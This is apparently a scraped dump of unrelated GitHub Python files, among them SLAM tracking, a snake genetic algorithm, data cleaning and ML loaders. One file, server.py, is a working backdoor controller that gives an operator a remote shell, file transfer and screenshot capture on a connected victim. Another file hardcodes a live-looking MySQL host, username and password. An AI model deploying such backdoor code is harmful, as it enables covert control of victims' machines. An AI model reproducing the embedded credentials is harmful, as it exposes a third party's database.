)\n tracks[i].point_3d = np.array([pt3d[0], -pt3d[1], -pt3d[2]])\n #color = imRGB[yy, xx] / 255\n #tracks[-1].color = color\n new_tracks.append(tracks[i])\n\n z_color = depth_to_color(z_depth);\n cv.circle(imRGB, (x, y), 3, z_color, -1)\n\n tracks = new_tracks\n\n # Draw the green lines showing the tracks:\n cv.polylines(imRGB, [np.int32(tr) for tr in tracks], False, (0, 255, 0))\n\n\n if haveInitialWorldMap:\n # Find the tracks that are connected to permanent (real-world) 3D points\n activePermPoints = 0\n for t in tracks:\n if t.realWorldPointIdx is not None:\n activePermPoints += 1\n\n\n ###########\n # BEGIN: find the transform from world coordinates to current camera coordinates\n ###########\n if activePermPoints > 0:\n world_points = np.empty((activePermPoints, 3))\n current_points = np.empty((activePermPoints, 3))\n\n i = 0\n for t in tracks:\n if t.realWorldPointIdx is not None:\n world_points[i] = permanent_cloud_points[t.realWorldPointIdx]\n current_points[i] = t.point_3d\n i += 1\n\n R, tt, inv_R = rigid_transform_3D(world_points, current_points)\n print(tt)\n else:\n print(' * Lost tracking.')\n ###########\n # END: find the transform from world coordinates to current camera coordinates\n ###########\n\n\n ########################################\n # All tracks that are connected to permanent (real-world) 3D points\n # will be transformed back into real-world coordinates. New points will\n # be added to the world as-is, existing points will be averaged in \n # (running average)\n \n for i, t in enumerate(tracks):\n if t.realWorldPointIdx is not None:\n # Convert t.point_3d to world coordinates:\n w3d = np.dot(inv_R, t.point_3d - tt)\n # Running avg:\n permanent_cloud_points[t.realWorldPointIdx] *= 0.99\n permanent_cloud_points[t.realWorldPointIdx] += 0.01 * w3d\n # Find any new, stable tracks:\n if t.realWorldPointIdx is None and len(t) > 20: # seems stable, so add it to the permanent point cloud\n # Convert t.point_3d to world coordinates:\n w3d = np.dot(inv_R, t.point_3d - tt)\n # Attach to permanent_cloud_points:\n t.realWorldPointIdx = len(permanent_cloud_points)\n permanent_cloud_points.append(w3d)\n \n\n if not haveInitialWorldMap:\n if len(tracks) > 50:\n doIt = True\n for t in tracks[:35]:\n if len(t) < 30:\n doIt = False\n break\n if doIt:\n print(\"ready to make initial map\")\n for t in tracks:\n if len(t) > 20: # seems to be stable, so add it to the world map\n t.realWorldPointIdx = len(permanent_cloud_points)\n permanent_cloud_points.append(t.point_3d)\n\n perm_pcd.points = open3d.utility.Vector3dVector(permanent_cloud_points)\n pcp_colors = np.tile([0, 0.5, 0], (len(permanent_cloud_points), 1))\n perm_pcd.colors = open3d.utility.Vector3dVector(pcp_colors)\n vis2.add_geometry(perm_pcd)\n\n haveInitialWorldMap = True\n\n\n # Every once-in-while, we'll try to add new points to the list of\n # points that we're tracking:\n if frame_idx % detect_interval == 0:\n\n # we won't bother detecting near points that we're already tracking:\n mask = np.zeros_like(frame_gray)\n mask[:] = 255\n for track in tracks:\n xy = track[-1]\n cv.circle(mask, xy, 5, 0, -1)\n\n pNew = cv.goodFeaturesToTrack(frame_gray, mask=mask, **feature_params)\n if pNew is not None:\n for x, y in np.float32(pNew).reshape(-1, 2):\n xx = max(0, min(int(round(x)), w_minus_1))\n yy = max(0, min(int(round(y)), h_minus_1))\n z_depth = depth_scale * imD[yy, xx]\n if z_depth < 8.0 and z_depth > 0.1:\n tracks.append(Track(maxlen=track_len))\n tracks[-1].append( (x, y) )\n pt3d = rs.rs2_deproject_pixel_to_point(rgb_intrinsics, [x,y], z_depth)\n tracks[-1].point_3d = np.array([pt3d[0], -pt3d[1], -pt3d[2]])\n #color = imRGB[yy, xx]\n #tracks[-1].color = color\n\n frame_idx += 1\n prev_gray = frame_gray\n\n update_point_cloud()\n\n if notAddedYet and len(pcd.points) > 50 and len(prev_pcd.points) > 50:\n vis.add_geometry(pcd)\n vis.add_geometry(prev_pcd)\n notAddedYet = False\n\n vis.update_geometry()\n vis.poll_events()\n vis.update_renderer()\n\n perm_pcd.points = open3d.utility.Vector3dVector(permanent_cloud_points)\n pcp_colors = np.tile([0, 0.5, 0], (len(permanent_cloud_points), 1))\n perm_pcd.colors = open3d.utility.Vector3dVector(pcp_colors)\n vis2.update_geometry()\n vis2.poll_events()\n vis2.update_renderer()\n\n\n '''\n if len(prev_points) > 10:\n R, tt = rigid_transform_3D(prev_points, cur_points)\n position = np.dot(R, position) + tt\n distance = cv.norm(position[:3])\n direction = np.dot(R, direction)\n #print(direction, position, \"%.02f\" % (distance))\n #print(R, tt)\n print(position[:3], direction, \"%.02f\" % (distance), len(permanent_cloud_points))\n '''\n\n cv.imshow('lk_track', imRGB)\n cv.moveWindow('lk_track', 20, 20)\n cv.waitKey(1)\n\n\n\n","repo_name":"magnusoy/Sparkie","sub_path":"python/src/deprecated/slam/odoslam/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10791,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"2"} +{"seq_id":"25236765224","text":"from rest_framework import serializers\nfrom .models import Team\n\nclass TeamSerializer(serializers.ModelSerializer):\n class Meta:\n model = Team\n fields = [\n 'name',\n 'image',\n 'city',\n 'sport',\n ]\n\n def validate_name(self, value):\n qs = Team.objects.filter(name__iexact=value)\n if self.instance:\n qs = qs.exclude(pk=self.instance.pk)\n if qs.exists():\n raise serializers.ValidationError(\"Team already exists.\")\n return value","repo_name":"ViishalTyagi/SportsTeamManager","sub_path":"teams/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12997394424","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport socket\nimport base64\n\ndef shell():\n\tcurrent_dir = target.recv(1024)\n\tcount = 0\n\twhile True:\n \t# Cambia el simbolo de la shell\n\t\tcomando = raw_input(\"{}~#: \".format(current_dir))\n\t\t# Si recibe un exit, envía el comando y cierra el bucle\n\t\tif comando == \"exit\":\n\t\t\ttarget.send(comando)\n\t\t\tbreak\n\t\t# Si recibe cd, envía el comando y actualiza la variable de directorio actual por la ruta que hayamos indicado\n\t\telif comando[:2] == \"cd\":\n\t\t\ttarget.send(comando)\n\t\t\tres = target.recv(1024)\n\t\t\tcurrent_dir = res\n\t\t# Si recibe un parametro vacío como puede ser un Enter, el bucle sigue corriendo\n\t\telif comando == \"\":\n\t\t\tpass\n\t\t# Si se ejecuta el comando \"download\", crea un fichero con el mismo nombre que vamos a descargar y escribe los datos encriptados en Base64\n\t\telif comando[:8] == \"download\":\n\t\t\ttarget.send(comando)\n\t\t\twith open(comando[9:], 'wb') as file_download:\n\t\t\t\tdatos = target.recv(30000)\n\t\t\t\tfile_download.write(base64.b64decode(datos))\n\t\t# Si se ejecuta el comando \"upload\", hace el procedimiento inverso a la descarga.\n\t\telif comando[:6] == \"upload\":\n\t\t\ttry:\n\t\t\t\ttarget.send(comando)\n\t\t\t\twith open(comando[7:], 'rb') as file_upload:\n\t\t\t\t\ttarget.send(base64.b64encode(file_upload.read()))\n\t\t\texcept:\n\t\t\t\tprint(\"Ocurrio un problema en la subida\")\n\t\telif comando[:10] == \"screenshot\":\n\t\t\ttarget.send(comando)\n\t\t\twith open(\"monitor-%d.png\" % count, 'wb') as screen:\n\t\t\t\tdatos = target.recv(1000000)\n\t\t\t\tdata_decode = base64.b64decode(datos)\n\t\t\t\tif data_decode == \"fail\":\n\t\t\t\t\tprint(\"No se pudo tomar la captura\")\n\t\t\t\telse:\n\t\t\t\t\tscreen.write(data_decode)\n\t\t\t\t\tprint(\"Captura correcta\")\n\t\t\t\t\tcount = count+1\n\t\telse:\n\t\t\ttarget.send(comando)\n\t\t\tres = target.recv(30000)\n\t\t\t# Recibe el 1 que hemos mandado desde el cliente y continua el bucle\n\t\t\tif res == \"1\":\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprint(res)\n\ndef upserver():\n\tglobal server\n\tglobal ip\n\tglobal target\n\t\n\t# INET para IPv4 y STREAM para puertos TCP\n\tserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\t# Le ponemos a la escucha en la IP y el puerto indicado\n\tserver.bind(('192.168.1.110',7777))\n\tserver.listen(1)\n\t\n\tprint(\"Corriendo servidor y esperando conexiones...\")\n\t\n\ttarget, ip = server.accept()\n\tprint(\"Conexion recibida de: \" + str(ip[0]))\n\nupserver()\nshell()\nserver.close()","repo_name":"atomarxculo/Backdoors","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23797881615","text":"# -*- coding: utf-8 -*-\nimport pymysql\nfrom datetime import datetime,timedelta\nimport requests\nimport re\n\nclass load_model():\n def __init__(self):\n self.model_name = 'cluster_abstract_model'\n self.model_version = '1.0'\n self.opinion_service_url = 'http://120.79.228.104:16006/get_news_opinions'\n\n def process(self, input_json):\n conn,cursor = self.connect_to_database()\n content_id_list = input_json.get('content_id_list')\n content_id_str = str([content_id_list])\n\n cluster_abstract = self.get_cluster_abstract(content_id_str)\n\n output_dict = dict()\n output_dict['cluster_abstract'] = cluster_abstract\n cursor.close()\n conn.close()\n return output_dict\n\n def get_version(self):\n return self.model_version\n\n def get_name(self):\n return self.model_name\n\n\n def svc(self,url, input_dict):\n response = requests.post(url=url, json=input_dict)\n return response.json() if response.ok else False\n\n def connect_to_database(self):\n conn = pymysql.connect(\n host='rm-wz9lh12zwnbo4b457.mysql.rds.aliyuncs.com',port=3306,\n user='melonfield',password='melonfield@DG_2020',\n charset='utf8mb4')\n cursor = conn.cursor()\n return conn,cursor\n\n \n def get_cluster_abstract(self,news_id_str):\n input_dict = {\n 'news_ids': news_id_str\n }\n r = self.svc(self.opinion_service_url, input_dict)\n if r:\n return r['result'][0]\n else:\n return ''","repo_name":"XUXiangCUHK/pinhole","sub_path":"editor_api/cluster_abstract_model/model_interface.py","file_name":"model_interface.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7193065758","text":"import pygame\nimport random\nimport time\nimport numpy as np\n\nimport Agent\nimport Brain\n\n#Random coordinate for apple and snake head spawn location which restricted to width and height\nget_random_apple = lambda: [random.randrange(1,79)*15,random.randrange(6,39)*15]\nrandom_coordinate = lambda: [random.randrange(7,79)*15,random.randrange(6,39)*15]\n\n\nWIDTH = 1200\nHEIGHT = 600\n\nscreen = pygame.display.set_mode((WIDTH,HEIGHT))\nclock = pygame.time.Clock()\n\nclass Env:\n \n def __init__(self,Population_Number):\n \n \n self.run = True\n self.apple = get_random_apple()\n self.Population = []\n self.Population_Number = Population_Number\n self.Died = []\n self.Next_Generation = []\n self.timer = time.time()\n self.epoch = 1\n \n #Creating Agents with their own random initial weights \n for i in range(self.Population_Number):\n weights1 = np.random.uniform(-1,1,(3, 8))\n weights2 = np.random.uniform(-1,1,(8, 4)) \n self.Population.append(Agent.Agent(self.apple, weights1, weights2))\n \n \n self.font = pygame.font.Font(None, 36)\n self.text_surface = self.font.render(\"\", True, (255, 255, 255))\n self.text_rect = self.text_surface.get_rect()\n self.text_rect.center = (100, 40)\n \n \n def check(self):\n if len(self.Population) < 1: \n self.crossover()\n self.apple = get_random_apple()\n\n for agent in self.Population:\n agent.Fitness = 0\n agent.head = random_coordinate()\n agent.distance = np.linalg.norm(np.array(agent.head) - np.array(self.apple))\n \n \n def eat_apple(self):\n \n self.apple = get_random_apple()\n \n for agent in self.Population:\n agent.distance = np.linalg.norm(np.array(agent.head) - np.array(self.apple))\n \n \n def step(self):\n \n pygame.draw.rect(screen, (252,0,0), [self.apple[0],self.apple[1], 15,15])\n \n for agent in self.Population:\n \n for pos in agent.tail:\n pygame.draw.rect(screen, (0,0,120), [pos[0], pos[1], 15,15])\n \n distance = agent.distance\n agent.move(self.apple)\n \n agent.tail.insert(0,list(agent.head))\n agent.tail.pop()\n \n if agent.distance >= distance: #If snake makes wrong prediction like despite direction to apple, it dies\n \n self.Died.append(agent)\n self.Population.remove(agent)\n self.check()\n \n # +score\n if self.apple == agent.head:\n agent.tail.insert(0,list(agent.head))\n self.eat_apple()\n \n \n def crossover(self):\n self.epoch += 1\n self.Died = sorted(self.Died, key=lambda agent: agent.Fitness)\n\n self.Next_Generation = []\n last_best = int((self.Population_Number - 1) * 0.95)\n self.Next_Generation.extend(self.Died[last_best:])\n self.Besties = self.Died[last_best:]\n\n self.Died.clear()\n \n while True:\n if len(self.Next_Generation) < self.Population_Number:\n member_1 = random.choice(self.Besties)\n member_2 = random.choice(self.Besties)\n\n member_1_weights_1 = member_1.network.weights1\n member_1_weights_2 = member_1.network.weights2\n\n member_2_weights_1 = member_2.network.weights1\n member_2_weights_2 = member_2.network.weights2\n\n chield_weights_1 = []\n chield_weights_2 = []\n\n for a,b in zip(member_1_weights_1, member_2_weights_1):\n for c,d in zip(a,b):\n prob = random.random()\n if prob < 0.47:\n chield_weights_1.append(c)\n elif prob < 0.94:\n chield_weights_1.append(d)\n else:\n chield_weights_1.append(random.uniform(-1, 1))\n\n for e,f in zip(member_1_weights_2, member_2_weights_2): #7/1\n for g,h in zip(e,f):\n prob = random.random()\n if prob < 0.47:\n chield_weights_2.append(g)\n elif prob < 0.94:\n chield_weights_2.append(h)\n else:\n chield_weights_2.append(random.uniform(-1, 1))\n\n chield_weights_1 = np.array(chield_weights_1).reshape(3,8)\n chield_weights_2 = np.array(chield_weights_2).reshape(8,4)\n\n self.Next_Generation.append(Agent.Agent(self.apple, chield_weights_1, chield_weights_2))\n\n else:\n break\n\n self.Population = self.Next_Generation\n \n \n def display(self):\n try:\n screen.fill((0,0,0))\n self.drawGrid()\n self.step()\n self.text_surface = self.font.render(\"Generation / Nesil: \"+str(self.epoch), True, (255, 255, 255))\n \n screen.blit(self.text_surface, self.text_rect)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.run = False\n\n pygame.display.update()\n pygame.time.delay(10) #Optional delay \n\n except Exception as e:\n print(e)\n self.run = False\n pygame.quit()\n \n def drawGrid(self):\n blockSize = 15 \n for x in range(0, 1200, blockSize):\n for y in range(75, 800, blockSize):\n rect = pygame.Rect(x, y, blockSize, blockSize)\n pygame.draw.rect(screen, (25,25,25), rect, 1)","repo_name":"RsGoksel/Genetic-Algorithm-Solutions","sub_path":"Game_Solutions/SnakeGame_Genetic/Environment.py","file_name":"Environment.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"40731636057","text":"# -*- coding:utf-8 -*-\nfrom PIL import Image\n\n# アニメーションの最初の画像のオブジェクト作成\nbefore = Image.open(\"user_image.jpg\")\n\n# アニメーションの最後の画像のオブジェクト作成\nafter = Image.open(\"seamlessclone.jpg\")\n\n# 画像を格納するリスト(空)を作成\nframes = []\n\n# beforeからafterへ徐々に変化させていく\nfor a in range(0, 101, 4):\n\n # beforeとafterの混ぜ具合を設定\n alpha = a / 100\n\n # beforeとafterをalphaの混ぜ具合でブレンド\n blended_image = Image.blend(before, after, alpha)\n\n # 作成した画像オブジェクトをリストに追加\n frames.append(blended_image)\n\n# durationを格納するリスト(空)を作成\nduration = []\n\n# 各画像に対してdurationを設定\nfor i in range(len(frames)):\n if i == 0 or i == len(frames) - 1:\n # 1枚目と最後の画像だけ2000ms表示\n duration.append(2000)\n else:\n # その他の画像は50ms表示\n duration.append(50)\n\n\n# アニメーション GIF として保存\nframes[0].save(\n # ファイル名\n \"neko_anime.gif\",\n\n # アニメーションとして保存\n save_all=True,\n\n # アニメーションに含ませる画像のリスト\n append_images=frames[1:],\n\n # 画像の表示時間(リストで指定)\n duration=duration,\n\n # 3回表示\n loop=2\n)","repo_name":"takumi4913/celeb_gan","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"42738954494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 18 20:27:12 2020\n\n@author: Rahul Khairnar\n\"\"\"\n\n#SALARY PARSING\n#COMPANY NAME TEXTT ONLY\n#STATE FIELD SPLITTING\n#AGE OF THE COMPANY\n#PARSING OF JOB DESCRIPTION\n\n\nimport pandas as pd\nimport matplotlib as mpl\nfrom datetime import *\n\ntoday = datetime.now()\nyear = today.year\nprint(year)\n\ndf = pd.read_csv(\"actual data_glassdoors.csv\")\ndf.head()\n\ndf.shape\n\n## SALARY CLEANING ##\ndf[\"Per_Hour\"] = df[\"Salary Estimate\"].apply(lambda x:1 if \"per hour\" in x.lower() else 0)\ndf[\"Employer_provided\"] = df[\"Salary Estimate\"].apply(lambda x:1 if \"employer provided\" in x.lower() else 0)\n\ndf = df[df[\"Salary Estimate\"]!=\"-1\"]\n\nSalary = df[\"Salary Estimate\"].apply(lambda x: x.split('(')[0])\n\nstriped_salary = Salary.apply(lambda x: x.replace(\"K\",\"\").replace(\"$\",\"\")) \n\nSalary_minus_hr = striped_salary.apply(lambda x: x.lower().replace(\"per hour\",\"\").replace(\"employer provided salary:\",\"\"))\n\ndf[\"min_salary\"] = Salary_minus_hr.apply(lambda x: int(x.split(\"-\")[0]))\ndf[\"max_salary\"] = Salary_minus_hr.apply(lambda x: int(x.split(\"-\")[1]))\ndf[\"Avg_salary\"] = (df[\"min_salary\"]+df[\"max_salary\"])/2\n\n## SALARY CLEANING SUCCESSFUL ##\n\n## GETTING THE AGE OF THE COMPANY FROM ITS ESTABLISHMENT DATE\ndf[\"Age_of_company\"] = df[\"Founded\"].apply(lambda x: int(2020-x))\ndf[\"Age_of_company\"] = df[\"Age_of_company\"].replace(to_replace = 2021,value= -1)\n## GETTING AGE SUCESSFUL ##\ndf[\"State\"] = df[\"Location\"].apply(lambda x: x.split(\",\")[1])\ndf[\"State\"].value_counts()\ndf[\"City\"] = df[\"Location\"].apply(lambda x: x.split(\",\")[0])\n\ndf[\"job_loc\"] = df.apply(lambda x: 1 if x.Location == x.Headquarters else 0, axis = 1)\n\ndf['Comp_Name'] = df.apply(lambda x: x['Company Name'] if x['Rating'] <0 else x['Company Name'][:-3], axis = 1)\n\n#### JOB DESCRIPTION PARSING PYTHON, R Studio, AWS, SPARK, EXCEL\ndf[\"Python\"] = df[\"Job Description\"].apply(lambda x: 1 if \"python\" in x.lower() else 0)\ndf[\"R_Studio\"] = df[\"Job Description\"].apply(lambda x: 1 if \"r studio\" in x.lower() else 0)\ndf[\"R_Studio\"] = df[\"Job Description\"].apply(lambda x: 1 if \" R \" in x else 0)\ndf[\"AWS\"] = df[\"Job Description\"].apply(lambda x: 1 if \"aws\" in x.lower() else 0)\ndf[\"SPARK\"] = df[\"Job Description\"].apply(lambda x: 1 if \"spark\" in x.lower() else 0)\ndf[\"EXCEL\"] = df[\"Job Description\"].apply(lambda x: 1 if \"excel\" in x.lower() else 0)\n\n## EXPORTING THE DF AS A CSV\nclean_data =df.drop(['Unnamed: 0'],axis=1)\nclean_data.to_csv(\"clean_data.csv\", index = False)\n","repo_name":"Rahul-Khairnar/Data-Scientist-Salary-Prediction","sub_path":"Data_Cleaning.py","file_name":"Data_Cleaning.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"71799720688","text":"#####################\n# CS 181, Spring 2016\n# Practical 1\n# Steven, Amelia, Wouter\n##################\n\n# Import necessary libraries\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#vars\narrays = []\n\n#functions\ndef readFile(filename, arrays): \n with open(filename, 'r') as csv_fh:\n # Read CSV file.\n reader = csv.reader(csv_fh)\n \n # Get first row of names and add an array for each column \n row1 = next(reader)\n for col in row1:\n arrays.append([])\n \n # Loop over the file. \n for row in reader:\n # Store the data.\n x = 0 \n for array in arrays:\n array.append(float(row[x]))\n x = x+1\n \ndef saveFile(filename, arrays): \n nFile = open(filename, 'wb')\n csvFile = csv.writer(nFile)\n csvFile.writerows(arrays)\n nFile.close\n \n#Unittest functions \nreadFile('sample1.csv', arrays)\nsaveFile('outputTest.csv', np.transpose(arrays))","repo_name":"SRutherf/CS181-P1","sub_path":"csvIO.py","file_name":"csvIO.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"862309380","text":"from __future__ import annotations\n\n\nfrom datadog_api_client.model_utils import (\n ModelSimple,\n cached_property,\n)\n\n\nclass MetricBulkTagConfigEmailList(ModelSimple):\n \"\"\"\n A list of account emails to notify when the configuration is applied.\n\n\n :type value: [str]\n \"\"\"\n\n @cached_property\n def openapi_types(_):\n return {\n \"value\": ([str],),\n }\n","repo_name":"DataDog/datadog-api-client-python","sub_path":"src/datadog_api_client/v2/model/metric_bulk_tag_config_email_list.py","file_name":"metric_bulk_tag_config_email_list.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"2"} +{"seq_id":"24084802306","text":"result = 0\nnumero = int(input('Digite um número: '))\nbase = input('''\nQual base de conversão pertende:\n1 - Binária\n2 - Hexadecimal\n3 - Octal\n: ''').strip().lower()[0]\n\nif base == '1':\n result = bin(numero)[2:]\n print(f'{numero}(BASE 10) = {result}(BASE 2)')\nelif base == '2':\n result = hex(numero).upper()[2:]\n print(f'{numero}(BASE 10) = {result}(BASE 16)')\nelif base == '3':\n result = oct(numero)[2:]\n print(f'{numero}(BASE 10) = {result}(BASE 8)')\nelse:\n print('Opção inválida')","repo_name":"EufranioDiogo/CursoEmVideoPythonExercicios","sub_path":"EXERCICIOS - MUNDO 2/Exerc002.py","file_name":"Exerc002.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"1423039964","text":"#!/usr/bin/env python3\n# Epidoc to csv converter\n# Brian Ballsun-Stanton\n# MIT License\n\nimport glob\nimport csv\nimport epidoc\nimport shutil\nimport os\nimport tqdm\nimport json\nimport numpy as np\nimport pandas as pd\n\nSOURCE_DIR = \"ISicily-ISicily-cf52385/inscriptions\"\nTARGET_DIR = \"output\"\n\n# clean target dir by deleting and recreating\nshutil.rmtree(TARGET_DIR, ignore_errors=True)\nos.mkdir(TARGET_DIR)\n\ndocs = []\n\n# get all files in source dir\nfor i, file in enumerate(tqdm.tqdm(glob.glob(f\"{SOURCE_DIR}/*.xml\"))):\n with open(file) as f:\n doc = epidoc.load(f)\n docs.append(doc)\n # if i > 10:\n # break\n # break\n\noutput_docs = []\n\n\n# Get Title, All instances of idno and terms\n# Terms hide under textClass\n\nmax_terms = 0\n\nfor doc in tqdm.tqdm(docs):\n line = {}\n line[\"title\"] = doc.title\n line[\"idno\"] = doc.idno\n for i, term in enumerate(doc.terms):\n # prepend _{i} to each key inside term\n for key in term.copy().keys():\n term[f\"term_{key}_{i}\"] = term.pop(key) \n line[f\"term_{i}\"] = term\n if max_terms < i:\n max_terms = i\n\n output_docs.append(line)\n\n\n\n# Write to JSON\nwith open(f\"{TARGET_DIR}/output.json\", \"w\") as f:\n json.dump(output_docs, f, indent=4)\n\n\n\n# Make output_docs a dataframe\ndf = pd.DataFrame(output_docs)\n# flatten the idno dictionary into the dataframe\ndf = pd.concat([df.drop([\"idno\"], axis=1), df[\"idno\"].apply(pd.Series)], axis=1)\nfor i in range(max_terms+1):\n print(i)\n df = pd.concat([df.drop([f\"term_{i}\"], axis=1), df[f\"term_{i}\"].apply(pd.Series)], axis=1)\n\n# Write to CSV\ndf.to_csv(f\"{TARGET_DIR}/output.csv\", index=False)\n\n\n","repo_name":"Denubis/EpidocPoC","sub_path":"epicdoc2csv.py","file_name":"epicdoc2csv.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35051725354","text":"import decimal\nimport reporter\nimport gevent\n\ndef Pi():\n \"\"\"\n Compute Pi to the current precision.\n\n Examples\n --------\n >>> print(pi())\n 3.141592653589793238462643383\n\n Notes\n -----\n Taken from https://docs.python.org/3/library/decimal.html#recipes\n \"\"\"\n decimal.getcontext().prec += 2 # extra digits for intermediate steps\n three = decimal.Decimal(3) # substitute \"three=3.0\" for regular floats\n lasts, t, s, n, na, d, da = 0, three, 3, 1, 0, 0, 24\n while s != lasts:\n lasts = s\n n, na = n + na, na + 8\n d, da = d + da, da + 32\n t = (t * n) / d\n s += t\n decimal.getcontext().prec -= 2\n return +s # unary plus applies the new precision\n\n\ndef run_pi_forever():\n while True:\n pi = Pi()\n gevent.sleep(0)\n\nif __name__ == \"__main__\":\n reporter.Reporter(\"pid_stats.conf\")\n decimal.getcontext().prec = 1000\n pirunner = gevent.spawn(run_pi_forever)\n gevent.joinall([pirunner])\n # print(time.ctime(time.time()))\n","repo_name":"efology/pid_stats","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32216336239","text":"import numpy as np\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nfrom torch.utils.data.dataloader import default_collate\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\n\nclass BaseDataLoader(DataLoader):\n \"\"\"\n Base class for all data loaders\n \"\"\"\n\n def __init__(self, dataset, batch_size, shuffle, validation_split, num_workers, collate_fn=default_collate):\n self.validation_split = validation_split\n self.shuffle = shuffle\n\n self.batch_idx = 0\n self.n_samples = len(dataset)\n\n self.sampler, self.valid_sampler = self._split_sampler(self.validation_split)\n\n self.init_kwargs = {\n 'dataset': dataset,\n 'batch_size': batch_size,\n 'shuffle': self.shuffle,\n 'collate_fn': collate_fn,\n 'num_workers': num_workers\n }\n super().__init__(sampler=self.sampler, **self.init_kwargs)\n\n def _split_sampler(self, split):\n if split == 0.0:\n return None, None\n\n idx_full = np.arange(self.n_samples)\n\n np.random.seed(0)\n np.random.shuffle(idx_full)\n\n if isinstance(split, int):\n assert split > 0\n assert split < self.n_samples, \"validation set size is configured to be larger than entire dataset.\"\n len_valid = split\n else:\n len_valid = int(self.n_samples * split)\n\n valid_idx = idx_full[0:len_valid]\n train_idx = np.delete(idx_full, np.arange(0, len_valid))\n\n train_sampler = SubsetRandomSampler(train_idx)\n valid_sampler = SubsetRandomSampler(valid_idx)\n\n # turn off shuffle option which is mutually exclusive with sampler\n self.shuffle = False\n self.n_samples = len(train_idx)\n\n return train_sampler, valid_sampler\n\n def split_validation(self):\n if self.valid_sampler is None:\n return None\n else:\n return DataLoader(sampler=self.valid_sampler, **self.init_kwargs)\n\n\nclass Base_dataset(Dataset):\n def __init__(self, config, mode, classes):\n \"\"\"\n\n Args:\n config (yaml): configuration file\n mode (string): 'train' 'validation' 'test'\n classes (int):\n \"\"\"\n super(Base_dataset, self).__init__()\n\n self.classes = classes\n\n self.mode = mode\n self.list_IDs, self.list_glosses = [], []\n self.config = config\n\n def __len__(self):\n \"\"\"\n\n Returns:\n (int) Number of samples\n \"\"\"\n return len(self.list_IDs)\n\n def __getitem__(self, index):\n \"\"\"\n Basically, __getitem__ of a torch dataset.\n Args:\n index (int): Index of the sample to be loaded.\n \"\"\"\n\n raise NotImplementedError\n\n def feature_loader(self, index):\n \"\"\"\n\n Args:\n index (int): Index of the sample to be loaded.\n \"\"\"\n raise NotImplementedError\n\n def video_loader(self, index):\n \"\"\"\n Load video function\n Args:\n index (int): Index of the sample to be loaded.\n \"\"\"\n raise NotImplementedError\n","repo_name":"iliasprc/COVIDNet","sub_path":"base/base_data_loader.py","file_name":"base_data_loader.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"2"} +{"seq_id":"14366012543","text":"from os.path import exists\n\nimport networkx as nx\nimport pandas as pd\n\nimport PC2P.Analysis.PredictedClusters_Analysis as pc2p_analysis\nimport lib.centrality\nimport lib.cluster\nimport lib.constants\nimport lib.files\nimport lib.graph\nimport lib.shapely_betweenness\n\n\ndef node_dataframe(\n network_name,\n clusters_name,\n _degree=False,\n _inviable=False,\n _icp55_shell=False,\n _pim1_shell=False,\n _betweenness=False,\n _closeness=False,\n _bridging=False,\n _eigenvector=False,\n _shapeley_betweenness=False,\n _cluster_id=False,\n _cluster_size=False,\n _cluster_degree=False,\n _cluster_eigenvector=False,\n _cluster_closeness=False,\n _cluster_betweenness=False,\n _cluster_shapely_betweenness=False\n):\n \"\"\"\n\n :param network: The filename (without the extension) of the network. E.g. icp55-cc-900-inv\n :param clusters: The filename (without the path or extension) of the clusters. E.g. mcl-2.5\n :param _columns: The desired computations.\n :return:\n \"\"\"\n\n # Read in the network.\n network = lib.graph.read_weighted_edgelist(lib.files.make_filepath_to_networks(f\"{network_name}.txt\"))\n\n # Read in the clusters.\n clusters_filename = lib.files.make_clusters_filename(network_name, clusters_name)\n clusters_filepath = lib.files.make_filepath_to_clusters(clusters_filename)\n clusters = lib.cluster.read_csv(clusters_filepath)\n\n # Make sure the clusters partition the network.\n clusters_proteins = lib.cluster.proteins(clusters)\n assert len(clusters_proteins) == len(network.nodes())\n assert set(clusters_proteins) == set(network.nodes())\n\n # Cast clusters to a subgraph datatype for algorithms.\n clusters = list(map(network.subgraph, clusters))\n\n # Define the columns of the dataframe.\n columns = {\n 'protein': [],\n 'degree': [],\n 'inviable': [],\n 'icp55_shell': [],\n 'pim1_shell': [],\n 'betweenness': [],\n 'eigenvector': [],\n 'closeness': [],\n 'bridging': [],\n 'shapely': [],\n 